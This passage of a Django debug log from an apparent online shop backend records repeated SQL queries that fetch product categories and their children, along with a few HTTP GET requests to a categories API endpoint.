"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:46:33,426 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:46:33,430 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:46:33,436 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:46:33,440 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:46:33,444 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:46:33,448 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:46:33,452 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:46:33,458 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:46:33,462 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:46:33,467 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:46:33,469 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:46:33,471 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:46:33,473 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:46:33,476 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:46:33,478 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:46:33,480 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:46:33,483 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:46:33,485 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:46:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:46:42,806 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:46:42,813 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:46:42,816 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:46:42,819 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:46:42,822 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:46:42,824 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:46:42,826 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:46:42,829 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:46:42,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:46:42,834 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:46:42,836 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:46:42,838 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:46:42,841 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:46:42,843 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:46:42,847 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:46:42,849 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:46:42,852 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:46:42,854 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:46:42,857 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:46:42,860 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:46:42,863 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:46:42,865 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:46:42,868 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:46:42,870 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:46:42,872 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:46:42,876 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:46:42,878 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:46:42,881 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:46:42,883 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:46:42,886 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:46:42,889 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:46:42,892 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:46:42,894 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:46:42,897 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:46:42,899 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:46:42,903 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:46:42,905 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:46:42,908 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:46:42,910 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:46:42,912 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:46:42,915 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:46:42,918 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:46:42,920 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:46:42,923 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:46:42,926 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:46:42,928 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:46:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:46:43,165 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-18 09:46:43,172 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [18/Dec/2019 09:46:43] "GET /api/v1/categories/6 HTTP/1.0" 200 956 [18/Dec/2019 09:47:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:48:14,186 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 